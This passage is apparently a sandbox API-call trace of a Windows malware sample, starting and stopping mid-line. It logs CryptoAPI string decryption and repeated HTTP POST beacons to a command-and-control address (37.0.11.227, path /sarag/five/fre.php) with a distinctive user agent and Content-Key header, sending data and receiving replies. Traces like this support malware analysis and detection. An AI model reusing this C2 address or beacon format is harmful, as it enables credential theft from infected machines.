buf=0x6aba40*, len=159, flags=0) returned 159 [0195.350] GetProcessHeap () returned 0x690000 [0195.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0195.350] recv (in: s=0x3d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.426] GetProcessHeap () returned 0x690000 [0195.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.427] GetProcessHeap () returned 0x690000 [0195.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.429] GetProcessHeap () returned 0x690000 [0195.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0195.429] GetProcessHeap () returned 0x690000 [0195.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0195.430] closesocket (s=0x3d4) returned 0 [0195.431] GetProcessHeap () returned 0x690000 [0195.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0195.431] GetProcessHeap () returned 0x690000 [0195.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.432] GetProcessHeap () returned 0x690000 [0195.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.432] GetProcessHeap () returned 0x690000 [0195.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1174) returned 0x3d4 [0195.436] Sleep (dwMilliseconds=0xea60) [0195.441] GetProcessHeap () returned 0x690000 [0195.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0195.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.442] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.448] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0195.455] GetProcessHeap () returned 0x690000 [0195.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0195.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.456] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.457] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.458] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.458] GetProcessHeap () returned 0x690000 [0195.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0195.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.459] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0195.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.460] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.461] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0195.461] GetProcessHeap () returned 0x690000 [0195.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.462] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.465] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.471] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.471] GetProcessHeap () returned 0x690000 [0195.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.471] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.471] GetProcessHeap () returned 0x690000 [0195.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.472] GetProcessHeap () returned 0x690000 [0195.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.472] GetProcessHeap () returned 0x690000 [0195.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.472] GetProcessHeap () returned 0x690000 [0195.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0195.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.473] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.478] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0195.486] GetProcessHeap () returned 0x690000 [0195.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0195.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.487] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.488] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.488] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.488] GetProcessHeap () returned 0x690000 [0195.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0195.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.492] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0195.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.494] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.495] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0195.495] GetProcessHeap () returned 0x690000 [0195.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.497] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0195.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.498] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0195.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0195.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0195.501] GetProcessHeap () returned 0x690000 [0195.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.501] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad838*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0195.501] GetProcessHeap () returned 0x690000 [0195.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0195.502] socket (af=2, type=1, protocol=6) returned 0x3d8 [0195.502] connect (s=0x3d8, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0195.526] FreeAddrInfoW (pAddrInfo=0x6ad838*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0195.526] GetProcessHeap () returned 0x690000 [0195.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0195.526] GetProcessHeap () returned 0x690000 [0195.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0195.527] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.527] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.527] GetProcessHeap () returned 0x690000 [0195.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0195.527] GetProcessHeap () returned 0x690000 [0195.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.528] GetProcessHeap () returned 0x690000 [0195.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0195.528] GetProcessHeap () returned 0x690000 [0195.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0195.529] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.531] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.531] GetProcessHeap () returned 0x690000 [0195.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0195.531] GetProcessHeap () returned 0x690000 [0195.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.532] send (s=0x3d8, buf=0x6abd08*, len=242, flags=0) returned 242 [0195.532] send (s=0x3d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0195.532] GetProcessHeap () returned 0x690000 [0195.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0195.533] recv (in: s=0x3d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.608] GetProcessHeap () returned 0x690000 [0195.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.609] GetProcessHeap () returned 0x690000 [0195.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0195.609] GetProcessHeap () returned 0x690000 [0195.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0195.609] GetProcessHeap () returned 0x690000 [0195.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0195.610] closesocket (s=0x3d8) returned 0 [0195.610] GetProcessHeap () returned 0x690000 [0195.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0195.610] GetProcessHeap () returned 0x690000 [0195.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.611] GetProcessHeap () returned 0x690000 [0195.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.611] GetProcessHeap () returned 0x690000 [0195.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x118c) returned 0x3d8 [0195.613] Sleep (dwMilliseconds=0xea60) [0195.615] GetProcessHeap () returned 0x690000 [0195.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0195.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0195.629] GetProcessHeap () returned 0x690000 [0195.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0195.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.630] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0195.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.631] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.631] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.631] GetProcessHeap () returned 0x690000 [0195.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0195.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.633] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0195.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.634] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0195.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.635] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0195.635] GetProcessHeap () returned 0x690000 [0195.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.636] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.637] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.638] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.639] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.640] GetProcessHeap () returned 0x690000 [0195.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.640] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.640] GetProcessHeap () returned 0x690000 [0195.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.640] GetProcessHeap () returned 0x690000 [0195.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.641] GetProcessHeap () returned 0x690000 [0195.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.641] GetProcessHeap () returned 0x690000 [0195.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0195.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0195.657] GetProcessHeap () returned 0x690000 [0195.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0195.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.659] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.660] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.661] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.661] GetProcessHeap () returned 0x690000 [0195.661] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0195.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.665] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0195.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.666] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.667] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0195.667] GetProcessHeap () returned 0x690000 [0195.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.668] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0195.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.669] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0195.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.670] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0195.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.671] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0195.671] GetProcessHeap () returned 0x690000 [0195.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0195.671] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad928*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0195.672] GetProcessHeap () returned 0x690000 [0195.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0195.672] socket (af=2, type=1, protocol=6) returned 0x3dc [0195.672] connect (s=0x3dc, name=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0195.745] FreeAddrInfoW (pAddrInfo=0x6ad928*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0195.745] GetProcessHeap () returned 0x690000 [0195.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0195.745] GetProcessHeap () returned 0x690000 [0195.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0195.746] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.747] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.747] GetProcessHeap () returned 0x690000 [0195.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0195.747] GetProcessHeap () returned 0x690000 [0195.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.747] GetProcessHeap () returned 0x690000 [0195.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0195.748] GetProcessHeap () returned 0x690000 [0195.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0195.748] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.749] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.749] GetProcessHeap () returned 0x690000 [0195.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0195.749] GetProcessHeap () returned 0x690000 [0195.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.750] send (s=0x3dc, buf=0x6abd08*, len=242, flags=0) returned 242 [0195.750] send (s=0x3dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0195.750] GetProcessHeap () returned 0x690000 [0195.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0195.750] recv (in: s=0x3dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.822] GetProcessHeap () returned 0x690000 [0195.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.823] GetProcessHeap () returned 0x690000 [0195.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.824] GetProcessHeap () returned 0x690000 [0195.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0195.825] GetProcessHeap () returned 0x690000 [0195.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0195.825] closesocket (s=0x3dc) returned 0 [0195.825] GetProcessHeap () returned 0x690000 [0195.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0195.826] GetProcessHeap () returned 0x690000 [0195.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 